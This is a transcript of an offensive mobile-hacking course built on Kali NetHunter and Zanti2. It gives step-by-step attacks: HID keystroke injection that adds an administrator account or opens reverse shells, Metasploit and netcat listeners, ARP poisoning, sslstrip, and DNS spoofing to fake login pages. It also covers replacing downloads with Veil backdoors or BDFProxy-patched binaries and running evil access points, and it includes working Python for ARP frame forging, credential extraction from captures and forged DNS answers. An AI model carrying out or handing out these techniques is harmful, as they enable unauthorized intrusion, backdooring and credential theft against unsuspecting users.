Transcript of Learn
This attack allows us to execute any command on, or gain full access to, any Windows computer that our Android device is plugged into.
How it works
Once connected, the Android device presents itself to the computer as a USB keyboard (a HID device) and types a series of commands very quickly. These commands can run any CMD command, or gain full access to the machine using the PowerSploit option.
This attack works even if AutoRun is disabled, because the commands arrive as ordinary keystrokes. The keystrokes go to whatever session is in front of the user, so the computer has to be unlocked with someone logged in.
There are two variations of this attack :
I am a keyboard
1. Windows CMD
This will allow us to run Windows commands on the target machine.
Just enter the commands you want to run in the "source" box, click "update" and then "Execute".
net user test /add
net localgroup administrators test /add
This will add a user "test" and put it in the administrators group (both commands only succeed if the command prompt the keystrokes open is running as an administrator).
2. PowerSploit
This will give us a Meterpreter session, i.e. full access to the target computer.
First of all we need to listen on a certain port for incoming connections so that the target machine can connect back to us.
This can be done from a laptop or from your Android device:
> msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_https
> set LHOST [YOUR IP]
> set LPORT [PORT]
> exploit -j  #run the handler in the background and keep the console
Now configure the payload on your Android device: set the IP and port to the same values you chose in the previous step and leave the URL as it is.
Now all you have to do is click on update and execute.
This is the device that will be used to control the target machine
Discover all connected devices to the network.
Determine the operating system of each device.
Determine the open ports and services running on these ports.
Zanti2 is a free mobile penetration testing framework that allows us to perform a number of penetration testing tasks.
In this lesson we will see how to use it to map the network our device is connected to: it shows the connected devices and some basic info about them, such as their operating system, IP address, MAC address and open ports.
By tapping on any discovered device, we can run a number of more advanced scans that display more information about it.
1. Ping scan/Quick scan/OS detection/Regular scan: will not display much more than the basic info you get from the initial scan Zanti performs.
2. Intense scan: slower than 1, gives more detailed info about the open ports and the services behind them.
3. Slow comprehensive scan: very slow, displays more info about the target, including filtered ports.
These are just sample scans; you can experiment with the scan options and see the difference between them.
Select target >> scan >> scan type
SpiderFoot is an open source footprinting tool. It is designed to make information gathering easier: it collects a lot of information about a domain and produces a report at the end with everything it gathered.
>> information gathering >> SpiderFoot
Then open http://127.0.0.1:5001 in the browser.
Now choose a scan name, enter the target domain, select the data you want to collect (you can group it by module) and tap "Run Scan".
Once the scan finishes, tap the "Browse" tab to see the final report or download it.
Network Discovery (War Driving)
Here we will learn how to discover all Wi-Fi networks within range and display useful information about them, like:
ESSID, or network name.
Network MAC address (BSSID).
We will use an app called Wifi Analyzer, which does all of the above and also features a signal strength meter that can be used to find the spots with the strongest signal.
Man In The Middle Attacks
This is one of the most dangerous and effective attacks available: it redirects the packets going to and from any client through our device, which makes us the "man in the middle" and lets us read, modify or drop those packets.
This is just another way of becoming the MITM (like the bad USB attack), but it is more effective and dangerous because it is very hard to protect against: it exploits the insecure way ARP works, and it needs no interaction with the target machine. (The usual defences are static ARP entries on the important hosts or dynamic ARP inspection on a managed switch; on a typical home or café network neither is in place.)
How it Works
ARP's main security issues:
1. Every ARP request/response is trusted; nothing in ARP authenticates the sender.
2. Clients accept a reply even if they never sent a request for it.
We first send an ARP reply to the client saying "I am the router": it tells the client that the device with the router's IP address has MY MAC address.
IP: Router IP
MAC: Hacker MAC
"I am the router"
Now we send an ARP reply to the router, this time saying "I am the client": it tells the router that the device with the client's IP address has MY MAC address.
IP: Client IP
MAC: Hacker MAC
"I am the client"
This means the router thinks I am the client, and the client thinks I am the router, so my device sits in the middle of the connection between them: every packet going to or from the client has to pass through my device first. (Our device also has to forward those packets on; with IP forwarding off they are dropped and the client simply loses its connection, which is the quickest way to get noticed.)
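To make the two replies concrete, here is an added example (my own code, not from the lesson and not from Zanti2) that builds the exact ARP reply frames described above and replays them into a simulated ARP cache: once with the trusting behaviour the two weaknesses describe, and once with a cache that only accepts replies it actually asked for. The IP and MAC addresses are made up for the walkthrough.

```python
import struct

# Constructed addresses for the walkthrough; they are not from any real network.
ROUTER_IP, ROUTER_MAC = "192.168.1.1", "aa:aa:aa:aa:aa:01"
CLIENT_IP, CLIENT_MAC = "192.168.1.5", "bb:bb:bb:bb:bb:05"
HACKER_MAC = "cc:cc:cc:cc:cc:99"

ETH_P_ARP = 0x0806   # Ethernet type for ARP
ARP_REPLY = 2        # ARP opcode: reply ("is-at")


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def arp_reply(claimed_ip, claimed_mac, target_ip, target_mac):
    """Build a 42-byte Ethernet frame carrying an ARP reply that says
    '<claimed_ip> is at <claimed_mac>', addressed to <target_mac>.
    Nobody asked for it, so it is an unsolicited (gratuitous) reply."""
    ethernet = mac_bytes(target_mac) + mac_bytes(claimed_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet, IPv4, hlen, plen, opcode
    arp += mac_bytes(claimed_mac) + ip_bytes(claimed_ip)       # sender hardware/protocol address
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)         # target hardware/protocol address
    return ethernet + arp


def parse_arp(frame):
    """Decode the ARP fields of a frame built by arp_reply (or sniffed off the wire)."""
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    return {
        "op": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


class ArpCache:
    """Simulated ARP cache of one host.

    trusting=True models the two weaknesses above: every reply is believed, and
    replies are accepted even when no request was sent.  trusting=False only
    accepts a reply for an IP the host actually asked about (that can still be
    beaten by racing the real answer, but it closes the unsolicited case)."""

    def __init__(self, trusting=True):
        self.table = {}
        self.pending = set()
        self.trusting = trusting

    def ask(self, ip):
        self.pending.add(ip)

    def receive(self, frame):
        reply = parse_arp(frame)
        if reply["op"] != ARP_REPLY:
            return False
        if not self.trusting and reply["sender_ip"] not in self.pending:
            return False
        self.table[reply["sender_ip"]] = reply["sender_mac"]
        self.pending.discard(reply["sender_ip"])
        return True


def poison(client, router):
    """The two replies from the lesson: 'I am the router' to the client and
    'I am the client' to the router.  Returns what each side now believes."""
    client.receive(arp_reply(ROUTER_IP, HACKER_MAC, CLIENT_IP, CLIENT_MAC))
    router.receive(arp_reply(CLIENT_IP, HACKER_MAC, ROUTER_IP, ROUTER_MAC))
    return client.table[ROUTER_IP], router.table[CLIENT_IP]


def demo(trusting=True):
    """Start both caches with the correct entries, poison them, report the result."""
    client, router = ArpCache(trusting), ArpCache(trusting)
    client.table[ROUTER_IP] = ROUTER_MAC
    router.table[CLIENT_IP] = CLIENT_MAC
    return poison(client, router)


if __name__ == "__main__":
    print("trusting caches:    ", demo(True))   # both entries now point at HACKER_MAC
    print("request-only caches:", demo(False))  # entries unchanged
```

Putting these frames on the wire takes a raw AF_PACKET socket bound to the interface, which needs root; that is what arpspoof (used later in this course) does for you. It also re-sends the replies every couple of seconds, because the genuine router and client keep answering real requests and would otherwise overwrite the poisoned entry.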
When we launch a MITM attack, all packets flow through our device, so we can read all the info sent to/from the target client, including URLs, usernames and passwords. We will use Zanti2 to poison the network and read this info.
This feature lets us inject HTML code into any page visited by the target client. That means we can use HTML injection and XSS-style payloads against every (plain HTTP) website the client visits, which allows attacks such as stealing cookies; but since we can already poison the network, we can do those attacks in better, more reliable ways. The feature is still useful if you want to mess with the client or add a certain piece of code to ALL pages the client visits. It cannot touch pages that are still served over HTTPS.
We can also capture the files downloaded by the target client. Not only that, we can replace them with another file, so when they download a PDF, for example, we can replace it with a malicious one that runs a backdoor or a keylogger on the target machine! Files are stored in
By tapping on "Logged Images" you will see all the images loaded by the target client; you can also replace all of these images with another one using the "Replace Images" feature.
Websites like Facebook, Yahoo, etc. use HTTPS on their login page, which means the page is protected by TLS and validated using a certificate, so the browser will show the user a warning that the certificate is invalid if there is a MITM. To bypass this, all you have to do is enable the "SSLstrip" feature in Zanti2, which rewrites every HTTPS link to HTTP, therefore the client will not see a
This is an implementation of the bad USB attack where the phone pretends to be a network card (a USB Ethernet adapter) once plugged into a computer, so that all of the computer's traffic is routed through the phone. Using any sniffer will then let us read all packets to/from the target machine.
DNS spoofing allows us to redirect any request for a certain domain to another domain; for example, we can redirect any request for facebook.com to a fake Facebook page!
Zanti2 only allows us to redirect ALL requests to a single domain, so I recommend using dnsspoof the same way we used it with the badUSB attack.
Fake Download Attack
Here we will use the same download interception attack we explained in the spying section, so that when the target client attempts to download a program it gets replaced with a backdoor.
1. Create a backdoor.
> apt-get install veil-evasion  #to install veil-evasion
> veil-evasion
> use [PAYLOAD]  #choose a payload that matches the handler in step 2, e.g. python/meterpreter/rev_http
> set LHOST [YOUR IP]
> set LPORT [PORT]
> generate
2. Listen for connections.
> msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_http
> set LHOST [YOUR IP]
> set LPORT [PORT]
> exploit -j
3. Run Zanti >> select target client >> MITM >> Intercept Downloads. Select exe as the file type and choose the backdoor we created in step 1.
Note: the replacement does not have to be a backdoor; it can be any file, such as a keylogger, a virus, etc.
The Backdoor Factory Proxy (BDFProxy) is a proxy that patches binaries with a backdoor while they are being downloaded, so any binary downloaded by the target client is turned into a backdoor while keeping its original functionality.
BDFProxy can be used behind a fake access point, or on a normal access point if we can MITM it.
1. Configure the shellcode settings
> nano /etc/bdfproxy/bdfproxy.cfg
Note: HOST is the IP of the device the client will connect back to (i.e. the one that will be listening for connections).
2. Start BDFProxy and send the clients' web traffic through it
> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080  #8080 is the proxy's default port
> bdfproxy
3. ARP poison the target (not needed with Mana, because the fake AP is already the gateway).
4. Start Metasploit to listen for connections.
> /etc/init.d/postgresql start
> /etc/init.d/metasploit start
> msfconsole -r /usr/share/bdfproxy/bdf_proxy_msf_resource.rc
Evil Access Point
In this section we will learn how to create an access point so that others can connect to it to access the internet.
This is no ordinary access point: we automatically become the man in the middle, because as the gateway all of the clients' data passes through us, so we can capture every credential the clients enter, modify packets, etc.
In this section we will learn how to prepare our device for penetration testing.
1. Install the device drivers on the computer.
2. Unlock the device (its bootloader).
3. Root it; this basically adds a root user to the device. Root is the user with full permissions on the device, which is essential for having full control over it.
4. Install NetHunter; this is a penetration testing platform (a Kali Linux chroot plus an Android app) built for Android devices.
Only Nexus and OnePlus devices are officially supported at the moment, but there are unofficial releases for other devices. The installation process is the same for all officially supported devices.
This is the main menu of NetHunter. It gives us access to all of NetHunter's features, including the main, most powerful attacks that can be launched from NetHunter.
We will explain all of these tools and attacks in detail in the coming lectures.
1. Download the flushiptables.sh file into /sdcard/files
2. Go to Kali Launcher >> Launch Shell in Terminal
> cd /sdcard/files
#change the working directory to /sdcard/files
> bash flushiptables.sh
#then run the start script that matches the Android version on the phone (only one of the two):
> bash startbadusb-kitkat.sh
> bash startbadusb-lollipop.sh
Now all the requests/responses sent to/from the target machine flow through our device, which makes us the Man In The Middle (MITM, hence the attack name). This means we can read and modify all data sent to/from the target device!
Detecting Undetectable Backdoors
Check the properties of the file.
Is it what it seems to be?
Run the file in a virtual machine and watch what it does (processes, files and network connections).
Use an online sandbox service.
Now that all the data is flowing through our device, all we have to do is store it in a file and read it later!
We will use a tool called tshark to do this.
> tshark -i rndis0 -w capture-file.log
#This stores the captured data in capture-file.log (rndis0 is the USB network interface the phone presents to the computer)
Now we can open this file with any packet analyzer; I prefer Wireshark.
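The following added example (my own, not part of the lesson and not a NetHunter tool) shows what a packet analyzer does with such a capture, and why the MITM sections earlier in the course can promise URLs, usernames and passwords: it writes a small classic-format pcap containing a constructed HTTP login POST and a harmless GET, reads it back and pulls the login fields out of the plaintext requests. Note that tshark -w writes pcapng by default; this reader handles the classic pcap format, which tshark writes with -F pcap and Wireshark can save as.

```python
import struct
from urllib.parse import unquote_plus

# Field names that usually carry login credentials in a web form.
CRED_FIELDS = ("user", "username", "login", "email", "pass", "password", "passwd", "pwd")


def ip_header(src, dst, payload_len):
    """Minimal IPv4 header (no options; checksum left zero, fine for a file, not for the wire)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 1, 0, 64, 6, 0,
                       bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split(".")))


def tcp_header(sport, dport):
    """Minimal TCP header: data offset 5 words, flags PSH|ACK, no options."""
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)


def frame(src_ip, dst_ip, sport, dport, payload):
    ethernet = b"\x00" * 12 + b"\x08\x00"          # MACs irrelevant here, EtherType IPv4
    return ethernet + ip_header(src_ip, dst_ip, 20 + len(payload)) + tcp_header(sport, dport) + payload


def pcap(frames):
    """Classic little-endian pcap: 24-byte global header, then 16-byte record headers."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)   # link type 1 = Ethernet
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f
    return out


def packets(data):
    """Yield the frames of a classic pcap file."""
    if struct.unpack("<I", data[:4])[0] != 0xA1B2C3D4:
        raise ValueError("not a little-endian classic pcap (pcapng needs a different reader)")
    off = 24
    while off + 16 <= len(data):
        caplen = struct.unpack("<IIII", data[off:off + 16])[2]
        yield data[off + 16:off + 16 + caplen]
        off += 16 + caplen


def tcp_payload(f):
    """Return (src_ip, dst_ip, payload) for an Ethernet/IPv4/TCP frame, else None."""
    if f[12:14] != b"\x08\x00" or f[23] != 6:        # EtherType IPv4, IP protocol TCP
        return None
    ihl = (f[14] & 0x0F) * 4
    tcp = 14 + ihl
    data_offset = (f[tcp + 12] >> 4) * 4
    src = ".".join(str(b) for b in f[26:30])
    dst = ".".join(str(b) for b in f[30:34])
    return src, dst, f[tcp + data_offset:]


def find_credentials(capture):
    """Scan every plaintext HTTP request in the capture for credential-looking fields.
    Returns (client ip, host+path, field, value) tuples."""
    found = []
    for f in packets(capture):
        parsed = tcp_payload(f)
        if parsed is None:
            continue
        src, _, payload = parsed
        if not payload.startswith((b"GET ", b"POST ")):
            continue
        head, _, body = payload.partition(b"\r\n\r\n")
        lines = head.split(b"\r\n")
        method, path, _ = lines[0].split(b" ", 2)
        host = b""
        for line in lines[1:]:
            if line.lower().startswith(b"host:"):
                host = line.split(b":", 1)[1].strip()
        if method == b"GET":                          # credentials sometimes ride in the query string
            body = path.partition(b"?")[2]
        for pair in body.split(b"&"):
            key, _, value = pair.partition(b"=")
            name = unquote_plus(key.decode("latin-1"))
            if name.lower() in CRED_FIELDS:
                found.append((src, (host + path.partition(b"?")[0]).decode("latin-1"),
                              name, unquote_plus(value.decode("latin-1"))))
    return found


def sample_capture():
    """Constructed capture: a login POST and an unrelated GET from the same client."""
    login = (b"POST /login HTTP/1.1\r\nHost: mail.example.com\r\n"
             b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
             b"username=alice%40example.com&password=s3cret%21&remember=1")
    search = b"GET /search?q=weather HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
    return pcap([frame("192.168.1.5", "93.184.216.34", 40001, 80, login),
                 frame("192.168.1.5", "93.184.216.34", 40002, 80, search)])


if __name__ == "__main__":
    for hit in find_credentials(sample_capture()):
        print(hit)
```

Wireshark's "http.request.method == POST" filter, or tshark's -Y with the same expression, gets you to the same packets interactively; the point of the code is that nothing in plain HTTP hides the form fields from whoever is on the path.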
Websites like Hotmail, Yahoo, etc. use HTTPS on their login page, which means the page is protected by TLS and validated using a certificate, so the browser will show the user a warning that the certificate is invalid if there is a MITM. To bypass this
we will use a tool called sslstrip, which downgrades HTTPS connections to HTTP (it only works against pages the browser first requests over plain HTTP, and not for sites the browser already knows as HSTS).
> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000  #send the clients' HTTP traffic to sslstrip, which listens on port 10000 by default
> sslstrip -p  #-p: log only the POSTs that were meant to go over SSL, i.e. the credentials
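As an added illustration (my own code, not sslstrip's source and not part of the lesson), here is the core of what sslstrip does to a response and why it has to keep state, run over a constructed response from a made-up login site. The last function shows the HSTS case where the downgrade cannot work, which is the limitation the Mana "bypass HSTS" mode later in the course is aimed at.

```python
import re

# Constructed response as the proxy would get it back from the real site over HTTPS.
SAMPLE_HEADERS = {
    "Content-Type": "text/html",
    "Location": "https://login.example.com/account",
    "Strict-Transport-Security": "max-age=31536000",
}
SAMPLE_BODY = """<html><body>
<a href="https://login.example.com/login">Sign in</a>
<form action="https://login.example.com/auth" method="post">
<img src="http://static.example.com/logo.png">
</body></html>"""

HTTPS_URL = re.compile(r"https://([A-Za-z0-9.-]+)")


class StripState:
    """What sslstrip has to remember: the hosts the client has been handed as plain
    http://, so that its follow-up requests can be sent back out over HTTPS."""

    def __init__(self):
        self.stripped_hosts = set()

    def strip_response(self, headers, body):
        """Downgrade a server response on its way to the client: every https:// link
        becomes http://, the Location header too, and the HSTS header is dropped so
        the browser is never told to insist on TLS.  Returns (headers, body)."""
        out = {}
        for name, value in headers.items():
            if name.lower() == "strict-transport-security":
                continue
            out[name] = self._strip_text(value)
        return out, self._strip_text(body)

    def _strip_text(self, text):
        def downgrade(match):
            self.stripped_hosts.add(match.group(1).lower())
            return "http://" + match.group(1)
        return HTTPS_URL.sub(downgrade, text)

    def upstream_url(self, client_url):
        """The client follows a stripped link over plain HTTP; the proxy re-upgrades it
        and talks TLS to the real site, so the site sees nothing unusual."""
        match = re.match(r"http://([A-Za-z0-9.-]+)(.*)", client_url)
        if match and match.group(1).lower() in self.stripped_hosts:
            return "https://" + match.group(1) + match.group(2)
        return client_url


def hsts_already_cached(browser_hsts_hosts, host):
    """Where the downgrade fails: if the browser already holds an HSTS entry for the
    host (from an earlier visit, or from the built-in preload list) it upgrades the
    URL itself and never sends plaintext.  Assumes includeSubDomains for simplicity."""
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in browser_hsts_hosts)


if __name__ == "__main__":
    state = StripState()
    headers, body = state.strip_response(SAMPLE_HEADERS, SAMPLE_BODY)
    print(headers["Location"])                                   # http://login.example.com/account
    print(state.upstream_url("http://login.example.com/auth"))   # https://login.example.com/auth
    print(hsts_already_cached({"facebook.com"}, "www.facebook.com"))  # True: strip would not work
```

The rewriting is only possible on the plaintext side: sslstrip itself talks HTTPS to the real site, and the client has to make its first request over HTTP (a hostname typed without https://, a link on an HTTP page) for the proxy to see anything at all.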
Arpspoof is part of a suite called dsniff, which contains a number of network penetration testing tools. Arpspoof can be used to poison the network and redirect traffic so that it flows through our device.
1. Tell the target client that I am the router.
> arpspoof -i [interface] -t [Target IP] [AP IP]
> arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1 #Example
2. Tell the AP that I am the target client (each arpspoof keeps running and re-sending its replies, so run the two in separate terminals).
> arpspoof -i [interface] -t [AP IP] [Target IP]
> arpspoof -i wlan0 -t 192.168.1.1 192.168.1.5 #Example
3. Enable IP forwarding so the packets flow through our device instead of being dropped (until this is on, the poisoned target has no connectivity at all, so do it first or right away).
> echo 1 > /proc/sys/net/ipv4/ip_forward
DNS spoofing allows us to redirect any request for a domain to another domain; for example, we can redirect any request for facebook.com to a fake Facebook page!
We will use a tool called dnsspoof to do this.
1. Create a dnsspoof config file. It is a hosts-style file: one entry per line with the IP to answer with and the hostname to answer for, and the hostname may contain wildcards (e.g. "*.facebook.com").
2. Run dnsspoof (it has to see the client's DNS queries, so we must already be the MITM or the gateway).
> dnsspoof -i rndis0 -f /path/to/config/file
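An added example (my own code, not dnsspoof's) of what the tool does with such a config file: it parses a constructed hosts-style file in the same format, and for a sniffed query whose name matches a pattern it forges a DNS answer pointing at our IP, reusing the query's transaction ID and question so the client accepts it. The 192.168.1.7 address is made up for the example.

```python
import fnmatch
import struct

# Constructed hosts file in dnsspoof's format: "<answer IP> <hostname pattern>" per line,
# '*' wildcards allowed, '#' starts a comment.
HOSTS_FILE = """\
# send every facebook hostname to the phone
192.168.1.7   *.facebook.com
192.168.1.7   facebook.com
"""


def parse_hosts(text):
    table = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            ip, pattern = line.split()
            table.append((pattern.lower(), ip))
    return table


def lookup(table, name):
    name = name.lower().rstrip(".")
    for pattern, ip in table:
        if fnmatch.fnmatchcase(name, pattern):
            return ip
    return None


def encode_name(name):
    out = b"".join(bytes([len(label)]) + label.encode() for label in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_name(msg, offset):
    """Read an uncompressed name; returns (name, offset just past it)."""
    labels = []
    while msg[offset] != 0:
        length = msg[offset]
        labels.append(msg[offset + 1:offset + 1 + length].decode())
        offset += 1 + length
    return ".".join(labels), offset + 1


def build_query(txid, name, qtype=1):
    """A standard recursive A query, as a client would send it (used as sample input)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # flags: RD; one question
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(msg):
    txid = struct.unpack("!H", msg[:2])[0]
    name, off = decode_name(msg, 12)
    qtype = struct.unpack("!H", msg[off:off + 2])[0]
    return txid, name, qtype, msg[12:off + 4]        # question section, verbatim


def spoof_response(query, table):
    """Forge an answer for the query if its name matches the table, else None."""
    txid, name, qtype, question = parse_query(query)
    if qtype != 1:                                   # only A records are spoofed here
        return None
    ip = lookup(table, name)
    if ip is None:
        return None
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # response, RD, RA; one answer
    answer = b"\xc0\x0c"                                        # pointer to the name at offset 12
    answer += struct.pack("!HHIH", 1, 1, 60, 4) + bytes(int(o) for o in ip.split("."))
    return header + question + answer


def answered_ip(response):
    """Extract the A record from a response built by spoof_response (for checking)."""
    _, off = decode_name(response, 12)
    off += 4                                         # skip qtype and qclass
    rdlength = struct.unpack("!H", response[off + 10:off + 12])[0]
    return ".".join(str(b) for b in response[off + 12:off + 12 + rdlength])


if __name__ == "__main__":
    table = parse_hosts(HOSTS_FILE)
    reply = spoof_response(build_query(0x1234, "www.facebook.com"), table)
    print(answered_ip(reply))                                              # 192.168.1.7
    print(spoof_response(build_query(0x1235, "www.example.com"), table))   # None
```

The forged answer has to reach the client before the real resolver's, which is why the attack needs the MITM position: from there we see the query first and can even drop the genuine reply. Resolvers randomize the source port and the query ID precisely against blind spoofing, but both are read straight out of the sniffed packet, so neither helps once we are on the path.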
We simply do this by creating a hotspot and then sniffing/modifying data the same way we did with the badUSB attack.
Mana-toolkit, however, makes the whole process much simpler: it automatically creates a new AP and starts sslstrip and firelamb, and it even attempts to bypass HSTS, which is used by Gmail and Facebook.
Another cool feature in Mana is that it lets us use a second wireless card as the upstream (internet) connection, instead of limiting us to the phone's 3G.
Mana has 3 main start scripts:
1. start-noupstream: starts an AP with NO internet connection.
2. start-nat-simple: starts a regular AP using the internet connection on the upstream interface.
3. start-nat-full: starts an AP with an internet connection, and also starts sslstrip, sslsplit and firelamb and attempts to bypass HSTS.
To start a script run:
> bash /usr/share/mana-toolkit/run-mana/script-name.sh
The captured traffic will be in /var/lib/mana-toolkit
HID Ducky Scripts
This menu allows us to write our own HID keyboard attacks.
We first write the attack as a Rubber Ducky script, and NetHunter converts it to its HID attack format for us.
Alternatively you can use any existing Rubber Ducky script, or use the payload generator to make one.
PS: links for the payload generator and for writing Rubber Ducky scripts are in the resources menu on the right.
Download & Execute
Here we will use a simple script that downloads a file and executes it.
This is really useful because it means we can run ANY file we want just by connecting our Android device to a computer; the file can be a backdoor, a virus, a keylogger, etc.
HID keyboard attacks work on ALL operating systems, including OS X, so today we will use a simple script to gain full access to any OS X machine once it is connected to our Android device via USB.
This script makes the target connect back to a certain IP address, and you need a tool called netcat to receive that connection. Netcat is preinstalled in NetHunter and in Kali Linux, and it can also be installed on Windows.
Run the following command to listen for incoming connections:
> nc -vv -l -p [PORT]
PS: the script is in the resources menu on the right.
We can use the exact same script we used on OS X to get a shell on any Linux device; the only thing we need to change is how the terminal is launched. In Ubuntu, for example, Alt+F2 opens the run dialog.
Cracking Wi-Fi Keys
NetHunter comes with the aircrack-ng suite and reaver preinstalled; these two are all you need to crack Wi-Fi keys, whether WEP, WPA or WPA2.
The process of cracking these keys is the same whether it is done from a PC or from an Android device, because the programs used are the same, so to avoid going off topic I will not explain how to crack Wi-Fi keys here. However, I have a full course explaining multiple attacks against each encryption type, so if you are interested in taking it, just message me and I will give it to you for $10 only.
To do this you need a powerful wireless card that supports monitor mode and packet injection; an example of such a card is the Alfa awus36.
These external wireless cards connect through USB, so you will need an OTG Y cable to use one with the phone.